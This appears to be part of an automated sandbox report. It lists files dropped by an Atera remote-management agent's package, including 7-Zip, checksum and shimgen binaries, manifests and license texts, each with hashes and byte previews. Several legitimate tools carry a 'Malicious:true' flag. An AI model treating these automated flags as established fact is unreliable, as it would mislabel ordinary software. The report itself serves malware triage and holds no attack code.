                                                                                                                                                                                                                                                                                              SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                                                                              SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cuninst.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):137216
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.163276282537277
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:pS791HpKIqGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:pO9xpKbShcHUa
                                                                                                                                                                                                                                                                                              MD5:5C9628C46256D0F6B14DE2168CBED8CC
                                                                                                                                                                                                                                                                                              SHA1:B7284385B0076623B76EC3FB2398B5EE8F3B9F85
                                                                                                                                                                                                                                                                                              SHA-256:354C3758A1F9E5A39E7292E9CCA353F815358977B3CC9A704BCEAB257AC6C24C
                                                                                                                                                                                                                                                                                              SHA-512:84886CF1632EFA70D8023F99A663E809422DFCC1C566793EF52078551DA105BFF1B2F9D54E197D8CCE53C3C725226635D623D9D539B5BFD4C17C802286EFADB4
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../$/b.................F...........d... ........@.. ....................................@..................................c..W.......`....................`....................................................... ............... ..H............text...$D... ...F.................. ..`.rsrc...`............H..............@..@.reloc.......`......................@..B.................d......H....... ....5...........................................................~....*.......*..(....*..0..%.......r...p..........{#.......{$.....()...*.r%..p*.0..........s+......}#.....}$...rk..p...,...s....((......{#....{$...s.......o......o......o......o......o......o......o........,R(....o....o ....2@rk..p~....-........s.........~....((.....o.....ru..po!.....o....s"...%(......(.....o#...(....o$...&..,.(....o%...(....o&...,.(....o'........,...o(.....*.........=.........(....*..(.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cuninst.exe.ignore

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:y:y
                                                                                                                                                                                                                                                                                              MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                                                                              SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                                                                              SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                                                                              SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cup.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):137216
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.162239721051707
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:TR9vHpKmEGCLOwstyhZFChcssc56FUrgxvbSD4UQrO2:F9/pKvShcHUa
                                                                                                                                                                                                                                                                                              MD5:8783ED37D6871AE20E4A65A655788A7E
                                                                                                                                                                                                                                                                                              SHA1:C42F5B032CF27FFC36869C22D5BE0363AC2E5AF4
                                                                                                                                                                                                                                                                                              SHA-256:5AFEF49A1BB85ED16EE7EF08D9ED694F166A9500701728770E50E92978566C5B
                                                                                                                                                                                                                                                                                              SHA-512:1FE424147DBAD7978F0C856D152F3236685C52DBCA5DD6AB7A03E5D1B8A08566FDF4574C4704FBEDF286A4C13B354D771E25D1B725D55578C14E9EAB2D8F9898
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0$/b.................F...........d... ........@.. ....................................@..................................c..W.......P....................`....................................................... ............... ..H............text....D... ...F.................. ..`.rsrc...P............H..............@..@.reloc.......`......................@..B.................c......H....... ....5...........................................................~....*.......*..(....*..0..%.......r...p..........{#.......{$.....()...*.r%..p*.0..........s+......}#.....}$...rk..p...,...s....((......{#....{$...s.......o......o......o......o......o......o......o........,R(....o....o ....2@rk..p~....-........s.........~....((.....o.....ru..po!.....o....s"...%(......(.....o#...(....o$...&..,.(....o%...(....o&...,.(....o'........,...o(.....*.........=.........(....*..(.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cup.exe.ignore

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:y:y
                                                                                                                                                                                                                                                                                              MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                                                                                                                                                                                              SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                                                                                                                                                                                              SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                                                                                                                                                                                              SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\softwareNameMap.txt

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (408), with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):408
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.5051207941364915
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:tGiELiPT5vHUiELiP3XojINW39z1vOiELiPXJ11vfioVGwpo1:bdbRdpkvNdvJf67Z1
                                                                                                                                                                                                                                                                                              MD5:0D66B84267AEEB09DB32BF6E06F6E010
                                                                                                                                                                                                                                                                                              SHA1:A0EC6D6F0CDEE193DA3CADA3244B3A4BDD6A4BEF
                                                                                                                                                                                                                                                                                              SHA-256:15ED64B66A8ADD588FB33BD20B9339C8C9A6B8DEB53AD3281F8CF1D9A7A1F2A7
                                                                                                                                                                                                                                                                                              SHA-512:B710FA222A98DCAC049552E5A26FF6096CAC65CCD294F5A73837785A2FB07D8143D9953DBFF4F0779C39C452394C411E7CB7BAD4C92FE7D5417D4E7D41AE9D41
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:W3siTmFtZSI6IjctWmlwICAoeDY0KSIsIlRoaXJkUGFydHlOYW1lIjoiN3ppcC5pbnN0YWxsIn0seyJOYW1lIjoiR29vZ2xlIENocm9tZSIsIlRoaXJkUGFydHlOYW1lIjoiR29vZ2xlQ2hyb21lIn0seyJOYW1lIjoiSmF2YSA4IFVwZGF0ZSAzODEiLCJUaGlyZFBhcnR5TmFtZSI6ImpyZTgifSx7Ik5hbWUiOiJNaWNyb3NvZnQgRWRnZSIsIlRoaXJkUGFydHlOYW1lIjoibWljcm9zb2Z0LWVkZ2UifSx7Ik5hbWUiOiJNaWNyb3NvZnQgRWRnZSBXZWJWaWV3MiBSdW50aW1lIiwiVGhpcmRQYXJ0eU5hbWUiOiJtaWNyb3NvZnQtZWRnZSJ9XQ==

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7z.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1167872
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.603432444128302
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24576:Gxb5vMX35l5UVrIdhcMEKWnttf7eePboHvVxSfOtl:GxbSz5UVrIdhnW1Pc96Otl
                                                                                                                                                                                                                                                                                              MD5:0DCE103B0102ADEC3279797665B7A4AE
                                                                                                                                                                                                                                                                                              SHA1:C121392BAB6DBA8D04BEE89C6B526E8E67650CC8
                                                                                                                                                                                                                                                                                              SHA-256:3DB62076E5FCC897FF29DA47FE4029900A4AD696B395B6FA96ACFF1229444C1D
                                                                                                                                                                                                                                                                                              SHA-512:20F0F02097694579AC8794D56411FBE2D97C47D37794CB52AFDABC9956C0452E8A3BB273ED34E463F31927E29E7E41C0FDDB82FBBE688DD39C4113C00EC91BC9
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l...(x.(x.(x.Gg.+x..d.!x.Gg.,x.Gg.*x..p..)x.(x.@x..p../x..^..x..^.*x.3.z..x....-x..~.)x..X.)x.Rich(x.........PE..L...`u.a...........!.........~.......>....................................................@.............................y.......d........{......................P.......................................................D............................text............................... ..`.rdata..............................@..@.data...............................@....sxdata......p......................@....rsrc....{.......|..................@..@.reloc...............@..............@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7z.dll.manifest

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):513
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.971000586893018
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:TMHdt43O5GgVNSSN/aN/2UjMNciq2xA5NEG:2dt4+GgBNCNFjMyisD
                                                                                                                                                                                                                                                                                              MD5:8F89387331C12B55EAA26E5188D9E2FF
                                                                                                                                                                                                                                                                                              SHA1:537FDD4F1018CE8D08A3D151AD07B55D96E94DD2
                                                                                                                                                                                                                                                                                              SHA-256:6B7368CE5E38F6E0EE03CA0A9D1A2322CC0AFC07E8DE9DCC94E156853EAE5033
                                                                                                                                                                                                                                                                                              SHA-512:04C10AE52F85D3A27D4B05B3D1427DDC2AFACCFE94ED228F8F6AE4447FD2465D102F2DD95CAF1B617F8C76CB4243716469D1DA3DAC3292854ACD4A63CE0FD239
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="7z" processorArchitecture="*" type="win32" />.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">.. <requestedExecutionLevel level="asInvoker" uiAccess="false" />.. </requestedPrivileges>.. </security>.. </trustInfo>..</assembly>..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7z.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):331776
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.512244761259412
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:J5lqo52kDzMYDJSi7+Ni2ER9Vh98+1PrEVhkQf0huIDaLOjm:JMqzBDJkk2ERvT8MPAf/O6
                                                                                                                                                                                                                                                                                              MD5:7187AE605F4DCE14BB23EA2623956335
                                                                                                                                                                                                                                                                                              SHA1:F7C1DF33B875C98F41DCDE24117D89D42D25B7CE
                                                                                                                                                                                                                                                                                              SHA-256:9E2631C19B243C28B0980607CED2540E9447B1166572483475547C1A9DD4AC0E
                                                                                                                                                                                                                                                                                              SHA-512:F64522E2FB6BB61884FE53C34E79B355EFB9EC33C02B2CD67D729AF7D763E7B3873A5C7CE6AC7BB4567E6BCF8C70CADBC66F511E8BB151AB05096A832032BC8F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@..|...|...|...p...|...w...|.d.r...|...v...|...x...|.i.#...|...}.|.|.d.!...|...w...|..V....|...v...|.......|. .z...|.Rich..|.........PE..L...`u.a.....................<......<.............@..........................p............@.....................................x.... .......................0...2......................................................(............................text...r........................... ..`.rdata..b...........................@..@.data....'..........................@....sxdata.............................@....rsrc........ ......................@..@.reloc...<...0...>..................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7z.exe.manifest

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):513
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.971000586893018
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:TMHdt43O5GgVNSSN/aN/2UjMNciq2xA5NEG:2dt4+GgBNCNFjMyisD
                                                                                                                                                                                                                                                                                              MD5:8F89387331C12B55EAA26E5188D9E2FF
                                                                                                                                                                                                                                                                                              SHA1:537FDD4F1018CE8D08A3D151AD07B55D96E94DD2
                                                                                                                                                                                                                                                                                              SHA-256:6B7368CE5E38F6E0EE03CA0A9D1A2322CC0AFC07E8DE9DCC94E156853EAE5033
                                                                                                                                                                                                                                                                                              SHA-512:04C10AE52F85D3A27D4B05B3D1427DDC2AFACCFE94ED228F8F6AE4447FD2465D102F2DD95CAF1B617F8C76CB4243716469D1DA3DAC3292854ACD4A63CE0FD239
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="7z" processorArchitecture="*" type="win32" />.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">.. <requestedExecutionLevel level="asInvoker" uiAccess="false" />.. </requestedPrivileges>.. </security>.. </trustInfo>..</assembly>..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7zip.license.txt

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1927
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.78095675693374
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:aCpXZHRo7dL53iEu+byAHsv7g6z0zBZfNP3VyFA:dlq7XTu+xCz0NxxVwA
                                                                                                                                                                                                                                                                                              MD5:899A48828B85C4B0402EE7CF1F65B62B
                                                                                                                                                                                                                                                                                              SHA1:73BA604E5A4E4EA6FB4AD23B8ADF3982B2C82D10
                                                                                                                                                                                                                                                                                              SHA-256:20343526E04CE61EED2675282462E7080D305246F7807386621149C2025765D9
                                                                                                                                                                                                                                                                                              SHA-512:EFD02998961261FFA64332EA13876906D55A8BD8209BF94F922D97889DDF1181129B6A08E5747F1C0A07E69CFC3A05E86D18AFC3E06325B51598F52360881B1B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview: 7-Zip.. ~~~~~.. License for use and distribution.. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.... 7-Zip Copyright (C) 1999-2016 Igor Pavlov..... Licenses for files are:.... 1) 7z.dll: GNU LGPL + unRAR restriction.. 2) All other files: GNU LGPL.... The GNU LGPL + unRAR restriction means that you must follow both .. GNU LGPL rules and unRAR restriction rules....... Note: .. You can use 7-Zip on any computer, including a computer in a commercial .. organization. You don't need to register or pay for 7-Zip....... GNU LGPL information.. --------------------.... This library is free software; you can redistribute it and/or.. modify it under the terms of the GNU Lesser General Public.. License as published by the Free Software Foundation; either.. version 2.1 of the License, or (at your option) any later version..... This library is distributed in the hope that it will be useful,.. but WITHOUT ANY WARRANTY; without even the implied warranty of.. MERCHANTABI

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):29184
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.423222213276874
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:02aUriLtuRZFwdpyTmNSHSBLVogO6QlRSO/:1r0ARZF6NFVogjQlRv/
                                                                                                                                                                                                                                                                                              MD5:5CA71CBFF5A8DE7E5E30B6E94CD42069
                                                                                                                                                                                                                                                                                              SHA1:991701A32492D743430627CBFBD56D6884C32588
                                                                                                                                                                                                                                                                                              SHA-256:23FBD1EE66FCE6872E97B2FE84C409AB30A74FE8720B722BC6F8BAE6E7764C04
                                                                                                                                                                                                                                                                                              SHA-512:77E31EC0DCA4E4895D3A4C0E84C6C1516D94089763F1735CAC150EFCD4EEC36107BB810E24D94C1208B7A80881D858DBFE887B32DA6F6D8F0C48F21C2525D0BE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......X.................f..........n.... ........@.. ....................................@................................. ...K.................................................................................... ............... ..H............text...te... ...f.................. ..`.rsrc................h..............@..@.reloc...............p..............@..B................P.......H.......8<...H......u...........P ......................................h.Mk_F!..D........%..............O...T.....7..u#..[h..T]..^....u.2yC.n........}..?)K.?!@.....3k+.....{.u.@.!q....|....$..f.s!...}.....(".....}....*:.{......o....*2.{....o....*2.{....o....*2.{....o#...*2.{....o$...*..*6.{.....o%...*6.{.....o&...*:.{......o'...*6.{.....o(...*F.{....o)........*F.{....o)........*6.{.....o....*6.{.....o....*6.{.....o....*:.{......o....*6.{.....o....*6.{.....o....*..*"..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.exe.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):150
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.731888600769331
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:vFWWMNHU8LdgCQcIMOofoObWNRXGws8FLu+gNlFueRObK4QIMOn:TMVBd1IGPKNxgUaNNu5W4QIT
                                                                                                                                                                                                                                                                                              MD5:E9AD5DD7B32C44F8A241DE0E883D7733
                                                                                                                                                                                                                                                                                              SHA1:034C69B120C514AD9ED83C7BAD32624560E4B464
                                                                                                                                                                                                                                                                                              SHA-256:9B250C32CBEC90D2A61CB90055AC825D7A5F9A5923209CFD0625FCA09A908D0A
                                                                                                                                                                                                                                                                                              SHA-512:BF5A6C477DC5DFEB85CA82D2AED72BD72ED990BEDCAF477AF0E8CAD9CDF3CFBEBDDC19FA69A054A65BC1AE55AAF8819ABCD9624A18A03310A20C80C116C99CC4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <runtime>.. <enforceFIPSPolicy enabled="false"/>.. </runtime>..</configuration>

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\checksum.license.txt

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):95
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.721635609555772
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:SZdFVJMXLreqXy1Wfardzl7BZyOX35++n:Sls/t+WfKj+OXV
                                                                                                                                                                                                                                                                                              MD5:A10B78183254DA1214DD51A5ACE74BC0
                                                                                                                                                                                                                                                                                              SHA1:5C9206F667D319E54DE8C9743A211D0E202F5311
                                                                                                                                                                                                                                                                                              SHA-256:29472B6BE2F4E7134F09CC2FADF088CB87089853B383CA4AF29C19CC8DFC1A62
                                                                                                                                                                                                                                                                                              SHA-512:CAE9F800DA290386DE37BB779909561B4EA4CC5042809E85236D029D9125B3A30F6981BC6B3C80B998F727C48EB322A8AD7F3B5FB36EA3F8C8DD717D4E8BE55E
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:CheckSum is licensed as Apache v2 - https://raw.github.com/ferventcoder/checksum/master/LICENSE

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):565672
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0581002983018335
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:hjgGwLGK4Uk0Ycoi6DdP51S2XI5cgGlKFTvr5pgx1v9/oLUmP9nVy:h7wj4kYcopdPm2ac8+1vVmPHy
                                                                                                                                                                                                                                                                                              MD5:F7B6AA803BE23C3192FCC2058D208F44
                                                                                                                                                                                                                                                                                              SHA1:A9569D1A4948FD33D388BB263B5CFF0D66E3BB34
                                                                                                                                                                                                                                                                                              SHA-256:D489923F1F91954B8AA15CD0E763132B9033780481D850D74395F5AB6E266C7C
                                                                                                                                                                                                                                                                                              SHA-512:7FD6E1B291503AC9A67128BAC2D6C8F21B40CE9DE99E015866FC62C79CBBAFCD25F3F43A0EB77A00B20C1D6BE9504E85458D503647BF2CF93BC71DAFB64AF122
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$./b.................x............... ........@.. ....................................@.................................(...W.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B................d.......H.......LX...=......8........@..........................................z.(......}.....(/...o0...}....*..*...0..)........{......E............?...Z...|....................*..}..... .>-.}......}.....*..}......{.... Z...a}......}.....*..}..... ?w*.}......}.....*..}......{.... Z...a}......}.....*..}..... H...}......}.....*..}......{.... ...a}......}.....*..}..... L...}......}.....*..}..... ...F}......}.....*..}.....*.....{....*.s1...z.2.{.....i...*....0..<........{......3..{....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\shimgen.license.txt

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):3758
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.882012677800436
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:wwVl/ldfbBaq9k4KM8da2J7LbyM71wKPC/:rVl/ldfsn4KM8daU7LP5wn/
                                                                                                                                                                                                                                                                                              MD5:89AC7C94D1013F7B3E32215A3DB41731
                                                                                                                                                                                                                                                                                              SHA1:1511376E8A74A28D15BB62A75713754E650C8A8D
                                                                                                                                                                                                                                                                                              SHA-256:D4D2EF2C520EC3E4ECFF52C867EBD28E357900E0328BB4173CB46996DED353F4
                                                                                                                                                                                                                                                                                              SHA-512:9BA2B0029E84DE81FFEF19B4B17A6D29EE652049BB3152372F504A06121A944AC1A2B1B57C6B0447979D5DE9A931186FEF9BD0667D5358D3C9CB29B817533792
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
